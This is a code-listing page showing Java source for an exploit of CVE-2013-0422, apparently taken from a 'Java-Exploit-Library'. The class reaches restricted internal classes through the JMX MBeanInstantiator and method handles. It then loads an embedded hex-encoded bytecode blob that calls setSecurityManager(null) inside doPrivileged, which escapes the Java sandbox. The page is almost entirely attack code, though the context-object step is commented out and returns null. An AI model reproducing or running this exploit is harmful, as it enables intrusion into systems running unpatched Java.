Package

Source Code of CVE_2013_0422a

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
/**
* Copyright (c) 2013-2014
*
* All rights reserved.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
* AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
* LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
* CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
* SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
* INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
* CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
* ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
* POSSIBILITY OF SUCH DAMAGE.
*
* The Java-Exploit-Library is licensed under the Creative Commons
* Attribution-ShareAlike 4.0 International License.
*
* Please see the provided LICENSE.txt for a full copy of the agreement.
*/
import java.lang.invoke.MethodHandle;
import java.lang.invoke.MethodHandles;
import java.lang.invoke.MethodType;
import java.lang.reflect.Method;

import com.sun.jmx.mbeanserver.JmxMBeanServer;
import com.sun.jmx.mbeanserver.JmxMBeanServerBuilder;
import com.sun.jmx.mbeanserver.MBeanInstantiator;

@SuppressWarnings("rawtypes")
public class CVE_2013_0422a {

  public static String byteArrayWithSecOff = "CAFEBABE0000003200270A000500180A0019001A07001B0A001C001D07001E07001F0700200100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100124C6F63616C5661726961626C655461626C65010001650100154C6A6176612F6C616E672F457863657074696F6E3B010004746869730100034C423B01000D537461636B4D61705461626C6507001F07001B01000372756E01001428294C6A6176612F6C616E672F4F626A6563743B01000A536F7572636546696C65010006422E6A6176610C000800090700210C002200230100136A6176612F6C616E672F457863657074696F6E0700240C002500260100106A6176612F6C616E672F4F626A656374010001420100276A6176612F73656375726974792F50726976696C65676564457863657074696F6E416374696F6E01001E6A6176612F73656375726974792F416363657373436F6E74726F6C6C657201000C646F50726976696C6567656401003D284C6A6176612F73656375726974792F50726976696C65676564457863657074696F6E416374696F6E3B294C6A6176612F6C616E672F4F626A6563743B0100106A6176612F6C616E672F53797374656D01001273657453656375726974794D616E6167657201001E284C6A6176612F6C616E672F53656375726974794D616E616765723B295600210006000500010007000000020001000800090001000A0000006C000100020000000E2AB700012AB8000257A700044CB1000100040009000C00030003000B000000120004000000080004000B0009000C000D000D000C000000160002000D0000000D000E00010000000E000F001000000011000000100002FF000C00010700120001070013000001001400150001000A0000003A000200010000000C01B80004BB000559B70001B000000002000B0000000A00020000001000040011000C0000000C00010000000C000F0010000000010016000000020017";
  private static MethodHandles.Lookup lookup;

  public static void main(String[] args) throws Throwable {
    System.setSecurityManager(new SecurityManager());
    System.out.println("SecurityManager: "+System.getSecurityManager());
   
    disableSecurity();
    System.out.println("SecurityManager: "+System.getSecurityManager());
  }
 
  private static void disableSecurity() throws Throwable {
      JmxMBeanServer beanServer = (JmxMBeanServer) new JmxMBeanServerBuilder().newMBeanServer("", null, null);
      MBeanInstantiator beanInstantiator = beanServer.getMBeanInstantiator();
      ClassLoader a = null;
      Class contextClass = beanInstantiator.findClass("sun.org.mozilla.javascript.internal.Context", a);
      Class generatedClassLoaderClass = beanInstantiator.findClass("sun.org.mozilla.javascript.internal.GeneratedClassLoader", a);
     
      lookup = MethodHandles.publicLookup();
     
      Object contextObject = createContextObject(contextClass, lookup);
     
      MethodType findVirtualType = MethodType.methodType(MethodHandle.class, Class.class, new Class[] { String.class, MethodType.class });
      MethodHandle findVirtualHandle = lookup.findVirtual(MethodHandles.Lookup.class, "findVirtual", findVirtualType);
     
      Object classLoader = createClassLoader(contextClass, generatedClassLoaderClass, contextObject, findVirtualHandle);
      Class customClass = createCustomClass(generatedClassLoaderClass, findVirtualHandle, classLoader);
     
      customClass.newInstance();
  }

  private static Class createCustomClass(Class generatedClassLoaderClass, MethodHandle findVirtualHandle,
      Object classLoader) throws Throwable {
    MethodType defineClassType = MethodType.methodType(Class.class, String.class, new Class[] { byte[].class });
    MethodHandle defineClassHandle = (MethodHandle) findVirtualHandle.invokeWithArguments(new Object[] { lookup, generatedClassLoaderClass,
        "defineClass", defineClassType });
   
   
    Class customClass = (Class) defineClassHandle.invokeWithArguments(new Object[] { classLoader, null, hex2Byte(byteArrayWithSecOff) });
    return customClass;
  }

  private static Object createClassLoader(Class contextClass, Class generatedClassLoaderClass, Object contextObject,
      MethodHandle findVirtualHandle) throws Throwable {
    MethodType createClassLoaderType = MethodType.methodType(generatedClassLoaderClass, ClassLoader.class);
    MethodHandle createClassLoaderHandle = (MethodHandle) findVirtualHandle.invokeWithArguments(new Object[] { lookup, contextClass,
        "createClassLoader", createClassLoaderType });
   
    Object classLoader = createClassLoaderHandle.invokeWithArguments(new Object[] { contextObject, null });
    return classLoader;
  }

  private static Object createContextObject(Class contextClass, MethodHandles.Lookup lookup) throws NoSuchMethodException, IllegalAccessException,
      Throwable {
//    MethodType findConstructorType = MethodType.methodType(MethodHandle.class, Class.class, new Class[] { MethodType.class });
//    MethodHandle findConstructorHandle = lookup.findVirtual(MethodHandles.Lookup.class, "findConstructor", findConstructorType);
   
    Method findConstrMethod = MethodHandles.Lookup.class.getMethod("findConstructor", Class.class, MethodType.class);
   
    MethodHandle unreflect = lookup.unreflect(findConstrMethod);
   
//    MethodType constructorType = MethodType.methodType(Void.TYPE);
//    MethodHandle constructorHandle = (MethodHandle) findConstructorHandle.invokeWithArguments(new Object[] { lookup, contextClass,
//        constructorType });
//   
//    Object contextObject = constructorHandle.invokeWithArguments(new Object[0]);
//    return contextObject;
    return null;
  }

  public static byte[] hex2Byte(String paramString) {
    byte[] arrayOfByte = new byte[paramString.length() / 2];
    for (int i = 0; i < arrayOfByte.length; i++) {
      arrayOfByte[i] = (byte) Integer.parseInt(paramString.substring(2 * i, 2 * i + 2), 16);
    }
   
    return arrayOfByte;
  }
}
TOP

Related Classes of CVE_2013_0422a

  • com.sun.jmx.mbeanserver.JmxMBeanServer
  • com.sun.jmx.mbeanserver.JmxMBeanServerBuilder
  • com.sun.jmx.mbeanserver.MBeanInstantiator
  • java.lang.reflect.Method
  • java.lang.invoke.MethodType
  • java.lang.invoke.MethodHandle
    • TOP
    Copyright © 2018 www.massapi.com. All rights reserved.
    All source code are property of their respective owners. Java is a trademark of Sun Microsystems, Inc and owned by ORACLE Inc. Contact coftware#gmail.com.